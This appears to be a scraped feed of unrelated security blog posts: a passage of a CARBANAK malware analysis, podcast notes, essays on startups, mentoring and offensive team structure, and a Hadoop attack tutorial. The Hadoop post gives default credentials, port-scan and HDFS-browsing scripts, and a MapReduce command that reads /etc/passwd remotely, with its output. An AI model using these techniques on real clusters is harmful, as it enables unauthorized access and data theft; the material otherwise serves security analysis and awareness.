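def xor_stream(data: bytes, key: bytes) -> bytes:
    # Repeating-key XOR: applying it twice with the same key
    # recovers the original data
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def make_session_key() -> bytes:
    # Version 2: a random key between 32 and 64 bytes per session
    return os.urandom(random.randint(32, 64))
```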

Version 3

Version 3 adds encryption to the headers. The first 19 bytes of the message headers (up to the <hdrXORKey2> field) are XORed with a five-byte key that is randomly generated per message and stored in the <hdrXORKey2> field. If the <flag> field of the message header is greater than one, the XOR key used to encrypt message bodies is iterated in reverse when encrypting and decrypting messages.

Version 4

This version adds a bit more complexity to the header encryption scheme. The headers are XOR encrypted with <hdrXORKey1> and <hdrXORKey2> combined and reversed.

Version 5

Version 5 is the most sophisticated of the binary protocols we have seen. A 256-bit AES session key is generated and used to encrypt both message headers and bodies separately. Initially, the key is sent to the C2 server with the entire message and headers encrypted with the RSA key exchange algorithm. All subsequent messages are encrypted with AES in CBC mode. The use of public key cryptography makes decryption of the session key infeasible without the C2 server’s private key.

The Roundup

We have rounded up 220 samples of the CARBANAK backdoor and compiled a table that highlights some interesting details that we were able to extract. It should be noted that in most of these cases the backdoor was embedded as a packed payload in another executable or in a weaponized document file of some kind. The MD5 hash is for the original executable file that eventually launches CARBANAK, but the details of each sample were extracted from memory during execution. This data provides us with a unique insight into the operational aspect of CARBANAK and can be downloaded here.

Protocol Evolution

As described earlier, CARBANAK’s binary protocol has undergone several significant changes over the years. Figure 7 illustrates a rough timeline of this evolution based on the compile times of samples we have in our collection. This may not be entirely accurate because our visibility is not complete, but it gives us a general idea as to when the changes occurred. We have observed that some builds of this data-stealing backdoor use outdated versions of the protocol, which may suggest that multiple groups of operators are compiling their own builds independently.

Figure 7: Timeline of binary protocol versions

*It is likely that we are missing an earlier build that utilized version 3.

Build Tool

Most of CARBANAK’s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings change for each sample we have encountered, even amongst samples with the same compile time. The RC2 key used for the HTTP protocol has also been observed to change among samples with the same compile time. These observations, paired with the use of campaign codes that must be configured, point to the likely existence of a build tool.

Rapid Builds

Despite the likelihood of a build tool, we have found 57 unique compile times in our sample set, some of them quite close together. For example, on May 20, 2014, two builds were compiled approximately four hours apart and were configured to use the same C2 servers. Again, on July 30, 2015, two builds were compiled approximately 12 hours apart.

What changes in the code can we see in such short time intervals that would not be present in a build tool? In one case, one build was programmed to execute the runmem command for a file named wi.exe while the other was not. This command downloads an executable from the C2 server and runs it directly in memory. In another case, one build was programmed to check Internet Explorer’s trusted sites list for the domain of Blizko, an online money transfer service, while the other was not. We have also seen different monitoring threads from Table 1 enabled from build to build. These minor changes suggest that the code is quickly modified and compiled to adapt to the needs of the operator for particular targets.

Campaign Code and Compile Time Correlation

In some cases, there is a close proximity of the compile time of a CARBANAK sample to the month specified in a particular campaign code. Figure 8 shows some of the relationships that can be observed in our data set.

Figure 8: Campaign code to compile time relationships

Recent Updates

Recently, 64-bit variants of the backdoor have been discovered. We shared details about these variants in a recent blog post. Some of them are programmed to sleep until a configured activation date, when they become active.


The “Carbanak Group”

Much of the publicly released reporting surrounding the CARBANAK malware refers to a corresponding “Carbanak Group” that appears to be behind the malicious activity associated with this data-stealing backdoor. FireEye iSIGHT Intelligence has tracked several separate overarching campaigns employing the CARBANAK tool and other associated backdoors, such as DRIFTPIN (aka Toshliph). With the data available at this time, it is unclear how interconnected these campaigns are: whether they are all directly orchestrated by the same criminal group, or whether they were perpetrated by loosely affiliated actors sharing malware and techniques.


In all Mandiant investigations to date where the CARBANAK backdoor has been discovered, the activity has been attributed to the FIN7 threat group. FIN7 has been extremely active against the U.S. restaurant and hospitality industries since mid-2015.

FIN7 uses CARBANAK as a post-exploitation tool in later phases of an intrusion to cement their foothold in a network and maintain access, frequently using the video command to monitor users and learn about the victim network, as well as the tunnel command to proxy connections into isolated portions of the victim environment. FIN7 has consistently utilized legally purchased code signing certificates to sign their CARBANAK payloads. Finally, FIN7 has leveraged several new techniques that we have not observed in other CARBANAK related activity.

We have covered recent FIN7 activity in previous public blog posts:

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on our investigations and observations into FIN7 activity.

Widespread Bank Targeting Throughout the U.S., Middle East and Asia

Proofpoint initially reported on a widespread campaign targeting banks and financial organizations throughout the U.S. and Middle East in early 2016. We identified several additional organizations in these regions, as well as in Southeast and Southwest Asia, being targeted by the same attackers.

This cluster of activity persisted from late 2014 into early 2016. Most notably, the infrastructure utilized in this campaign overlapped with LAZIOK, NETWIRE and other malware targeting similar financial entities in these regions.


DRIFTPIN (aka Spy.Agent.ORM, and Toshliph) has been previously associated with CARBANAK in various campaigns. We have seen it deployed in initial spear phishing by FIN7 in the first half of 2016.  Also, in late 2015, ESET reported on CARBANAK associated attacks, detailing a spear phishing campaign targeting Russian and Eastern European banks using DRIFTPIN as the malicious payload. Cyphort Labs also revealed that variants of DRIFTPIN associated with this cluster of activity had been deployed via the RIG exploit kit placed on two compromised Ukrainian banks’ websites.

FireEye iSIGHT Intelligence observed this wave of spear phishing aimed at a large array of targets, including U.S. financial institutions and companies associated with Bitcoin trading and mining activities. This cluster of activity remains active to this day, targeting similar entities. Additional details on this latest activity are available on the FireEye iSIGHT Intelligence MySIGHT Portal.

Earlier CARBANAK Activity

In December 2014, Group-IB and Fox-IT released a report about an organized criminal group using malware called "Anunak" that has targeted Eastern European banks, U.S. and European point-of-sale systems and other entities. Kaspersky released a similar report about the same group under the name "Carbanak" in February 2015. The name “Carbanak” was coined by Kaspersky in this report – the malware authors refer to the backdoor as Anunak.

This activity was further linked to the 2014 exploitation of ATMs in Ukraine. Additionally, some of this early activity shares a similarity with current FIN7 operations – the use of Power Admin PAExec for lateral movement.


The details that can be extracted from CARBANAK samples provide us with unique insight into the operational side of this data-stealing malware. Looking at such data in bulk, as discussed above, supports several inferences, summarized as follows:

  1. Based upon the information we have observed, we believe that at least some of the operators of CARBANAK either have direct access to the source code and know how to modify it, or have a close relationship with the developer(s).
  2. Some of the operators may be compiling their own builds of the backdoor independently.
  3. These attackers likely use a build tool that allows the operator to configure details such as C2 addresses, C2 encryption keys, and a campaign code. This build tool encrypts the binary’s strings with a fresh key for each build.
  4. Varying campaign codes indicate that independent or loosely affiliated criminal actors are employing CARBANAK in a wide range of intrusions targeting a variety of industries, especially financial institutions across the globe and the restaurant and hospitality sectors within the U.S.

Startup Security Weekly #43 – Never Stop Believing

The six secrets to starting smart, a startup’s guide to protecting trade secrets, knowing what your customers value, and more articles for discussion. In the news, updates from Netskope, Yubikey, CybelAngel, and more on this episode of Startup Security Weekly!

Full Show Notes: Visit for all the latest episodes!

Startup Security Weekly #44 – Selling Ice to an Eskimo

Tarun Desikan of Banyan joins us alongside guest host Matt Alderman. In the news, negotiation mistakes that are hurting your deals, hiring re-founders, updates from Hexadite, Amazon, Sqrrl, and more on this episode of Startup Security Weekly!

Full Show Notes: Visit for all the latest episodes!

Enterprise Security Weekly #48 – Making Everybody Mad

Paul and John discuss building an internal penetration testing team. In the news, automating all the things, Juniper Networks opens a software-defined security ecosystem, millions of devices are running out-of-date systems, Duo and McAfee join forces, and more in this episode of Enterprise Security Weekly!

Full Show Notes: Visit for all the latest episodes!

Blackhat, BSidesLV and DEF CON Parties 2017


Back once again for the Blackhat, BSidesLV and DEF CON Parties 2017. Here is the list. Please note that this is a work in progress and I’ll be sure to add more as I become aware of them.

Please note that this schedule should work fine in most smartphone browsers.


Be sure to RSVP for parties that require it, as the vast majority will not allow folks to register at the door. Please note that events that are not searchable, or that have not directly requested I post them, will not be included here.

Got a Party?

Most importantly, if I’m missing a 2017 party here, please let me know through our contact us form and I’ll be sure to add them.

Copyright: pressmaster / 123RF Stock Photo


The post Blackhat, BSidesLV and DEF CON Parties 2017 appeared first on Liquidmatrix Security Digest.

What’s It Like to Join a Startup’s Executive Team?

Startups are the innovation engine of the high-tech industry. Those who’ve participated in them have experienced the thrill and at times the disappointment of navigating uncharted territories of new ideas. Others have benefited from the fruits of these risk-takers’ labor by using the products they created.

What’s it like to contribute at an early stage of a startup? Below are my reflections on the first few months I’ve spent at Minerva so far. I joined this young endpoint security company as VP of Products not too long ago (and I’m loving it). I’ve outlined some takeaways in a generalized form that might benefit others in a similar position or those that are curious about entrepreneurial environments.

Situational Awareness: Where Am I?

When you come into a company—large or small—you already have some idea of the type of organization you’re joining. Your understanding is incomplete at best. After all, it’s based on your perspective as an outsider, and is informed mainly by the company’s official external communications (website, brochures, job postings) and the interactions you’ve had during the interviewing process.

Of course, you’ll learn as much as you can about the firm before deciding to come on board; validate all your assumptions and fill in the gaps in your understanding after starting the job:

  • If the company is small, this quite literally means taking the time to speak with as many of your new colleagues as possible, not only to start getting to know them, but also to understand their perspective on the company’s successes and challenges. Who are these individuals, what do they do, and how might you be of help?
  • Similarly, talk to the board members: What are they most excited about? What are their biggest concerns? What do they expect of you? In what ways might they be able to help you in meeting those objectives, on the basis of their expertise and connections? How involved do they want to be in the company’s operations and your activities?
  • In addition, understand the mindset of the company’s customers and partners. What do they appreciate the most about the firm? Where do they see opportunities for improvements? How do they collaborate with the company today? How might you assist them in the short and long term? Where might they help you?

At this initial stage of your involvement with the company, you still have the benefit of easily asking questions that might later sound silly. At the moment, it’s also easier to let yourself say “I don’t know, but I’ll find out” when you face a question you cannot answer. You’re gaining situational awareness, starting to understand your tools and priorities, getting to know the people, and adjusting the mental model you’ve built while you were still an outsider to the firm.

I had the benefit of participating in Minerva’s Advisory Board prior to becoming an employee. This allowed me to get to know some of my future colleagues and confirm that we’d get along, as well as make sure that we were aligned on the company’s direction. Still, only after spending several weeks immersed in the company’s day-to-day activities did I truly begin to feel like I knew where I was and what I was doing there.

Takeaways: It takes longer than you might expect to feel fully engaged and productive with the new team. Do your research beforehand, but accept that you can only see a sliver of the actual company. Interact with others as much as possible, but leave time for reflection.

Self-Discovery: Who Are We?

If you’re joining a startup’s executive team, there’s a good chance that it’s entering a new phase of its life cycle. In the case of Minerva, I came on board as the company was preparing to enter the US market. It was starting to build a sales force and formalize its go-to-market strategy. The firm had been in existence for three years by that time, which allowed it to build the underlying framework and several product components. It had gained feedback from early customers, assembled the R&D team, and was ready to make itself known to the world.

After establishing an executive team, the startup will likely be looking to learn from its experiences so far and determine the direction for the next stage of its development. Since you’re new to the effort, you’ll need to begin by learning about your colleagues’ impressions and ideas before voicing your own. However, don’t wait too long before sharing your opinions. For the next few weeks you still have the fresh perspective that allows you to empathize with outsiders—customers, analysts, partners, investors—in a way that’s very difficult to do once you’ve formally integrated into the collective.

Lots of frameworks exist for helping you and other members of the executive team determine the business strategy. You can start with SWOT analysis, which, as Wikipedia summarizes, encourages you to understand the following aspects of your firm:

  • Strengths: “characteristics of the business … that give it an advantage over others”
  • Weaknesses: “characteristics of the business that place [it] at a disadvantage relative to others”
  • Opportunities: “elements in the environment that the business … could exploit to its advantage”
  • Threats: “elements in the environment that could cause trouble for the business”

If, like me, you are focused on product management, you might benefit from my Product Management Framework for Creating Security Products, which recommends asking and answering the following questions:

It will likely take many brainstorming sessions, informal conversations, emails and adviser interactions to understand and verbalize the way in which your solution is related to other products in your ecosystem. What problems are you solving and, most importantly, what are you not trying to tackle? What’s your competition? Why should customers care about you? What will industry analysts think? Once you’ve figured this out, know that you’ll need to adjust as the company and the market evolve.

As with any self-reflective experience, determining who you are and how you hope to be perceived by others is both challenging and exhilarating. Engaging in this exercise forces you to ask tough questions about yourself. You also need to tap into your inner optimist to envision a future in which you’ll succeed despite, or perhaps because of, the challenging road ahead.

In the case of Minerva, the company developed a unique way of combating evasive malware. However, having a strong technological base alone is insufficient: we needed to determine how to explain not only what we do, but why customers would benefit from the solution in a way that they cannot with the existing security layers. How are we related to baseline anti-malware tools? What about the “next-gen” players? (For more on this, see my Questions for Endpoint Security Startups post.)

Takeaways: Harness the external perspective you have after just joining the firm to introduce new ideas and challenge the old ones. Recognize that marketing and management frameworks are just suggestions for how to devise a business strategy. Be realistic about market dynamics and possibilities, but remember the need to stay optimistic when embarking upon new ventures.

External Communication

Once you understand where you are and who your company is, you’re ready to explain this to others. That means making your presence known in the targeted markets, as you begin to fill the sales pipeline and close deals, and as you continue to develop your product. You’re not only interacting with prospective customers directly, but are also working with industry analysts and other influencers, educating them about your existence and value proposition, and soliciting feedback regarding the vision for your product.

Your company probably has a budding sales force, which you need to equip with the tools they’ll use when explaining the value of your solution. Depending on your specific role, you might be tasked with creating, contributing to, or providing feedback on internal documentation that summarizes the results of the earlier self-discovery process, to keep everyone in the company informed and marching to the same beat. Ditto for external-facing collateral, such as the company’s website contents, brochures, whitepapers, etc. Many of the documents the company developed in its earlier stages might need to be revised, retired or expanded.

External communications are about persuasion: you need to convince others to pay attention to your ideas and solutions, which often entails changing their perspective and challenging their assumptions.

You’re passionate about the benefits of your technology; yet, organizations are cautious of newcomers. Moreover, the market is dominated by the rhetoric of the incumbents, which requires the new entrants to clearly articulate how they fit into the existing marketplace and educate prospects about seeing through the marketing hype. To be heard, a young company must engage in persuasive communications as it builds up its core customer base and establishes a reputation. As a member of the executive team, it’s up to you to make this happen.

As I write this, Minerva just announced the closing of a Series A funding round. Encouraged by the enthusiasm of early adopters and the feedback from prospects, we established a sales team, formalized product roadmap plans, and updated the company’s marketing collateral. A lot of my time is spent speaking with prospects, customers, analysts, partners and, of course, colleagues, in addition to continuing to enhance the product.

Takeaways: Understanding your product’s value and your company’s strategy is only part of the battle. Persuading others to support you in this endeavor requires lots of external communications (see How to Be Heard in IT Security and Business). Be ready to spend lots of time writing papers, creating and editing slide decks, drafting and answering emails, speaking on the phone and meeting with people one-on-one and at industry events. And continue to deliver upon product roadmap commitments.

Mentoring: On meeting your **Heroes**


I put heroes in asterisks because none of us have paparazzi following us around. I regularly use Val Smith's quote that even the most popular infosec person is about as famous as a famous bowler. Except for rare exceptions, no one outside of our community knows who we are. I've broken into at least one company from every vertical, and my neighbor just asks me to help configure his wifi.

This topic came up because the person I'm mentoring met "a famous infosec person" and the guy proceeded to be a drunk dbag to him. It took quite a bit of wind out of his sails to have someone he kinda looked up to bag on his current career state and the talks he was working on.

When I first joined the Army, I thought anyone with a "tower of power" (Expert Infantry Badge, Airborne, Air Assault) was an awesome, do-no-wrong individual. Shit, if someone has all that on their chest, they must be badass, right??!!
For more info on badges:

Well, the Army does a great job of stacking the deck so that the people you initially meet are pretty decent individuals. I think most people think highly of their drill sergeants their entire lives. So the first few people I met who had these badges reaffirmed this belief. Then I got out, met a few more, and was completely let down by the quality of these people. When I say let down, I mean defeated/totally bothered that these people didn't live up to the pedestal I had put them on. It REALLY bothered me.

What you learn is that in the military you get to wear a badge you earned at any point in your career for the rest of your career. So maybe at some point someone was awesome enough to earn a badge. This doesn't mean they are a great leader, still good at what the badge represents, or even a good person. It means that at one point in time they met a set of criteria and earned a badge.

How does this relate to Infosec?

We are all humans and generally react poorly to any sort of fame.

A good chunk of us are introverts.

The "community" values exploits and clever hacks over being a good person or helping others.

We have people that, 10 years later, are still riding the vapor trails of some awesome shit they did but haven't done anything else relevant since. Some people have giant egos and only care about you if you are currently in the process of kissing their ass. To be fair, if people ARE kissing your ass it's hard not to get an ego, but you have to work hard to check that shit at the door.

Remember we are famous bowlers?

What can you do?

Check your ego.

Stay Humble.

Help (mentor) others.

When you are someone else's hero, always remember how you felt when your hero dissed you.


Hack Naked News #128 – June 6, 2017

Exploiting Windows 10, mimicking Twitter users, vulnerabilities in new cars, security issues surrounding virtual personal assistants, and more. Jason Wood of Paladin Security joins us to discuss sniffing out spy tools with ridesharing cars on this episode of Hack Naked News!

Full Show Notes: Visit for all the latest episodes!

The Offensive Cyber Security Supply Chain

During the past few weeks, several people have asked me how to build a "cyber security offensive team". Since the question keeps recurring, I decided to write a bit about my point of view and my past experiences on this topic without getting into details (no procedures, methodologies, communication artifacts or skill sets will be provided).

Years ago, a well-skilled and malicious actor (let me call him a hacker, even if I am perfectly aware this is not the right word) could launch a single, sophisticated attack able to hit significant infrastructures and cause large, glaring damage. Nowadays this scenario is (fortunately) more unlikely, since cyber defense technology has made huge strides and public/private organizations have assembled blue teams of cyber security experts. The most doubtful of my readers are probably thinking that offensive technology has made huge strides as well, and I perfectly agree! However, you will probably also agree that attack complexity has risen considerably: years ago, to perform a successful cyber attack you didn't need intermediaries such as anonymizers, malware evasion techniques, fast flux, DGAs and, more generally speaking, all the techniques required to trick (or elude) blue teams, since no blue teams (or very few) existed. My point here is pretty clear: while years ago a single hacker was enough to attack a structured system (for example: ICS, government networks, or corporate networks), nowadays if you really want to successfully create a cyber security "army" you need a structured group of people. Talented people are very important, but not as much as they were in past years. From my point of view, talented people should move from technical operations to organizational operations. I'll try to better explain this point of view in what follows.

The question now gets pretty easy: "What does that group do? And how should it be organized?"

A team is usually a group of people that works together to reach a common target. The target should be clear to every team member (if you want a performing team), and every team member should share the same team belief to get the tasks done and quickly reach the targets.

The group of people making up an "offensive cyber security group" is not a "team" (as defined above); it is closer to a software supply chain, where everybody has specific tasks and different targets. Let me put it this way: if your task is to build a PDF parsing library, you don't need to know where your library will be used, since your target is to build a generic and reusable library. Someone could use your library for a nice "automatic invoice maker" or for "injecting malicious JavaScript into a PDF", and for you (the PDF library writer) nothing should change. For this reason I would not call this group of people an Offensive Cyber Security Team but rather an Offensive Cyber Security Supply Chain (OCSSC). Every stage of the supply chain is carried out by a specific team.

As with every supply chain, the OCSSC needs common rules, methodologies and best practices to be shared among its stages, such as:
- Communication artifacts. What artifacts are exchanged between the supply chain teams?
- Procedures. What global procedures shall be followed between teams? What procedures are needed intra-team?
- Tools. What are the most useful tools intra-team? And what tools are used between teams?
- Skill sets. What skill sets are needed for each team?
- Recovery procedures. What special procedures make up the intra-team recovery plan?

I am not going to answer those questions, since my goal is not to help my readers build an OCSSC; on the contrary, it is to alert blue teams that offensive actors are getting more structured and purposeful day by day. However, I will give a broad view of how an OCSSC could be organized in 2017.

The following image shows 5 stages representing 5 different teams, which collaborate through well-known artifacts.

Offensive Cyber Security Supply Chain

I call the first team the Hunters. This team should be able to find new exploitable vulnerabilities in common software. It needs strong contacts inside the hacking community, in order to eventually acquire 0-days from third parties, as well as up-to-date and sharp fuzzers. This team needs a private cloud with intensive computational resources in order to fuzz several pieces of software in parallel. It gets feedback on what to fuzz from the community and from the Dev-Stage team, which indicates to the Hunters the most interesting software to investigate for vulnerabilities. In real life, this team could be the one that finds vulnerabilities such as, for example, the infamous MS17-010.

I call the second team Dev-Stage. This team is mainly made up of developers. The aim of Dev-Stage is to develop droppers starting from exploits: it takes exploit artifacts from the Hunters and arms the developed exploit kits and/or weaponizes the developed worms. The Dev-Stage team should be able to answer the question: "How do I technically infect victims?" It gets two artifacts as input: one from the Dev-Payload team, suggesting what kind of dropping method it needs, and one from the Intruders, suggesting whether to focus more on "web", "physical", "dedicated devices" and so on. In real life, this team could be the one that builds exploit kits and/or dropping technology such as, for example, EternalBlue.

I call the third team Dev-Payload. This team is mainly made up of developers and software testers. The aim of Dev-Payload is to build the dropped payload. This team needs to take care of communication channels, system persistence, evasion techniques and extensibility. It gets artifacts from the Dev-Stage team in order to perform deep, well-structured tests, and feedback from the Intruders, who suggest what functionalities should be developed to reach the Intruders' targets. In real life, this is the team that develops malware (or RATs) such as, for example, WannaCrypt0r or DoublePulsar.

I call the fourth team the Intruders. The Intruders are the ones who perform the first intrusion actions. This team gets as input artifacts such as: (1) the developed Dev-Stage deliverable (for example, the exploit kit to be implanted) and (2) the developed payload (for example, the malware to be dropped on the target system). It also gets feedback from the Socials team, with suggestions on which websites and/or infrastructures to attack. The Intruders are not developers but mainly penetration testers: people who get access to external resources (such as public websites or public infrastructures) and compromise them by injecting the Dev-Stage artifacts. The Intruders might need to build new infrastructure, such as new websites or new public resources, in order to fully arm a target system. In real life, this team could be the one that infects public websites with exploit kits such as, for example, Angler, Neutrino or Terror EK.

I call the fifth team the Socials. This team is mainly made up of communicators and marketing people who are able to perform the following actions: on one side, getting and giving light artifacts (A2l) from/to the hacking community in order to maintain a presence in it; on the other side, attracting targets to the infrastructures prepared by the Intruders. They give feedback to the Intruders in order to steer their operations toward what is really useful against the attacked target. In real life, this group is the closest to human intelligence (HUMINT).

Every team in the Offensive Cyber Security Supply Chain needs to work together, but without knowing the other teams' targets. Every team is in charge of specific goals. Communication artifacts, sharing tools and operational tools play fundamental roles in getting things done. A talented supervisor is needed to ensure smooth communication between teams and to organize the overall supply chain. This is one of the most important roles, and it must belong to a great leader able to deal with highly talented technical people. The supervisor should know methodologies, processes and best practices very well, and he should have a brilliant view of the overall scenario. He should have a solid technical and hacking background, and he should never stop learning from the other members. Great communication skills are required in order to develop leadership.

This post was about the Offensive Cyber Security Supply Chain. The goal of this quick blog post was to push common blue teams and defense agencies forward by increasing their awareness of how an OCSSC could be organized in 2017. We are currently experiencing a big shift in offensive operations from single talented individuals to well-structured and organized supply chains; we need to reinforce and structure our defenses as well.

DevOoops: Hadoop

What is Hadoop?

"The Apache Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models. It is designed to scale up from single servers to thousands of machines, each offering local computation and storage. Rather than rely on hardware to deliver high-availability, the library itself is designed to detect and handle failures at the application layer, so delivering a highly-available service on top of a cluster of computers, each of which may be prone to failures."

If you've ever heard of "big data", you've heard of Hadoop.

NFI what I'm talking about? Here is a 3-minute video on it:

What are common issues with MapReduce / Hadoop?

Hadoop injection points, from Kaluzny's ZeroNights talk:


Common default credentials: admin/admin, cloudera/cloudera

Although occasionally you'll find one that will just let you pick your own :-)

If you gain access, you get full HDFS access, can run queries, etc.

HDFS exposes a web server which is capable of performing basic status monitoring and file browsing operations. By default this is exposed on port 50070 on the NameNode. Accessing http://namenode:50070/ with a web browser will return a page containing overview information about the health, capacity, and usage of the cluster (similar to the information returned by bin/hadoop dfsadmin -report).

From this interface, you can browse HDFS itself with a basic file-browser interface. Each DataNode exposes its file browser interface on port 50075.
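The same NameNode also serves the WebHDFS REST API on that port, so the file browsing above can be scripted too. Here's a minimal stdlib-only Python sketch (the function name and the host are mine, not from any Hadoop tooling; it assumes a default cluster with no auth, where WebHDFS is enabled on 50070):

```python
import json
from urllib.request import urlopen

def list_hdfs_dir(namenode, path="/", port=50070):
    """List an HDFS directory over WebHDFS (no auth on a default cluster)."""
    url = "http://%s:%d/webhdfs/v1%s?op=LISTSTATUS" % (namenode, port, path)
    with urlopen(url) as resp:
        statuses = json.load(resp)["FileStatuses"]["FileStatus"]
    # Each entry carries name, DIRECTORY/FILE type, and size in bytes
    return [(s["pathSuffix"], s["type"], s["length"]) for s in statuses]

# e.g. list_hdfs_dir("namenode") or list_hdfs_dir("namenode", "/user")
```

Walking the tree from `/` with calls like this gets you the same view the 50070/50075 browser pages give, minus the clicking.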

Update: the Hadoop attack library is worth checking out.

The most up-to-date presentation on the Hadoop attack library:

There is a piece around RCE.

You'll need the info found at ip:50070/conf
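That `/conf` page is just the cluster's live configuration dumped as XML, so pulling out the values you need for job submission can be scripted. A stdlib-only Python sketch (the function name is mine; the property keys are standard Hadoop configuration names, and the host is whatever NameNode you found):

```python
import xml.etree.ElementTree as ET
from urllib.request import urlopen

def fetch_hadoop_conf(host, port=50070,
                      keys=("fs.defaultFS", "yarn.resourcemanager.address")):
    """Fetch /conf from the NameNode web UI and return selected properties."""
    with urlopen("http://%s:%d/conf" % (host, port)) as resp:
        root = ET.parse(resp).getroot()
    # /conf is a flat <configuration> of <property><name/><value/></property>
    conf = {p.findtext("name"): p.findtext("value")
            for p in root.iter("property")}
    return {k: conf.get(k) for k in keys}
```

Those two keys tell you where the NameNode metadata service and the ResourceManager actually live, which is exactly what a remote job submission needs.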

TL;DR: find the correct open Hadoop ports and run a MapReduce job against the remote Hadoop server.
You need to be able to access the following Hadoop services through the network:
  • YARN ResourceManager: usually on ports 8030, 8031, 8032, 8033 or 8050
  • NameNode metadata service in order to browse the HDFS datalake: usually on port 8020
  • DataNode data transfer service in order to upload/download file: usually on port 50010
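A quick way to check which of those services are reachable is a plain TCP connect scan. A minimal Python sketch (the port list is just the defaults quoted above; the function name is mine):

```python
import socket

# Default ports for the services listed above (Hadoop 2.x defaults)
HADOOP_PORTS = {
    8020: "NameNode metadata service",
    8030: "YARN ResourceManager",
    8031: "YARN ResourceManager",
    8032: "YARN ResourceManager",
    8033: "YARN ResourceManager",
    8050: "YARN ResourceManager",
    50010: "DataNode data transfer",
    50070: "NameNode web UI",
}

def scan_hadoop_ports(host, ports=None, timeout=1.0):
    """Return the subset of the given ports that accept a TCP connection."""
    open_ports = []
    for port in sorted(ports if ports is not None else HADOOP_PORTS):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means the connect succeeded
                open_ports.append(port)
    return open_ports
```

If 8020, one of the ResourceManager ports, and 50010 all come back open, the streaming-job trick below should be on the table.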

Let's see it in action:

lookupfailed-2:hadoop CG$ hadoop jar /usr/local/Cellar/hadoop/2.7.3/libexec/share/hadoop/tools/lib/hadoop-streaming-2.7.3.jar -input /tmp/a.txt -output blah_blah -mapper "/bin/cat /etc/passwd" -reducer NONE

17/01/05 22:11:40 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
packageJobJar: [/var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/hadoop-unjar5960812935334004257/] [] /var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/streamjob4422445860444028358.jar tmpDir=null
17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at
17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at
17/01/05 22:11:43 INFO mapred.FileInputFormat: Total input paths to process : 1
17/01/05 22:11:43 INFO mapreduce.JobSubmitter: number of splits:2
17/01/05 22:11:44 INFO mapreduce.JobSubmitter: Submitting tokens for job: job_1483672290130_0001
17/01/05 22:11:45 INFO impl.YarnClientImpl: Submitted application application_1483672290130_0001
17/01/05 22:11:45 INFO mapreduce.Job: The url to track the job:
17/01/05 22:11:45 INFO mapreduce.Job: Running job: job_1483672290130_0001
17/01/05 22:12:00 INFO mapreduce.Job: Job job_1483672290130_0001 running in uber mode : false
17/01/05 22:12:00 INFO mapreduce.Job:  map 0% reduce 0%
17/01/05 22:12:10 INFO mapreduce.Job:  map 100% reduce 0%
17/01/05 22:12:11 INFO mapreduce.Job: Job job_1483672290130_0001 completed successfully
17/01/05 22:12:12 INFO mapreduce.Job: Counters: 30
File System Counters
FILE: Number of bytes read=0
FILE: Number of bytes written=240754
FILE: Number of read operations=0
FILE: Number of large read operations=0
FILE: Number of write operations=0
HDFS: Number of bytes read=222
HDFS: Number of bytes written=2982
HDFS: Number of read operations=10
HDFS: Number of large read operations=0
HDFS: Number of write operations=4
Job Counters 
Launched map tasks=2
Data-local map tasks=2
Total time spent by all maps in occupied slots (ms)=21171
Total time spent by all reduces in occupied slots (ms)=0
Total time spent by all map tasks (ms)=21171
Total vcore-milliseconds taken by all map tasks=21171
Total megabyte-milliseconds taken by all map tasks=21679104
Map-Reduce Framework
Map input records=1
Map output records=56
Input split bytes=204
Spilled Records=0
Failed Shuffles=0
Merged Map outputs=0
GC time elapsed (ms)=279
CPU time spent (ms)=1290
Physical memory (bytes) snapshot=209928192
Virtual memory (bytes) snapshot=3763986432
Total committed heap usage (bytes)=65142784
File Input Format Counters 
Bytes Read=18
File Output Format Counters 
Bytes Written=2982
17/01/05 22:12:12 INFO streaming.StreamJob: Output directory: blah_blah

lookupfailed-2:hadoop CG$ hadoop fs -ls blah_blah
17/01/05 22:12:22 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Found 3 items
-rw-r--r--   3 root supergroup          0 2017-01-05 22:12 blah_blah/_SUCCESS
-rw-r--r--   3 root supergroup       1491 2017-01-05 22:12 blah_blah/part-00000
-rw-r--r--   3 root supergroup       1491 2017-01-05 22:12 blah_blah/part-00001

lookupfailed-2:hadoop CG$ hadoop fs -cat blah_blah/part-00001
17/01/05 22:12:49 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false

Walks you through how to get reverse shells or Meterpreter shells (Windows) if you can run commands.


video of above talk from appsecEU 2015

What did I miss?  Anything to add?

Enterprise Security Weekly #47 – You Burn, You Learn

Corey Bodzin of Tenable joins us. In the news: the power of exploits, Carbon Black's open letter to Cylance, security measures increasing due to ransomware attacks, and more in this episode of Enterprise Security Weekly! Full Show Notes: for all the latest episodes!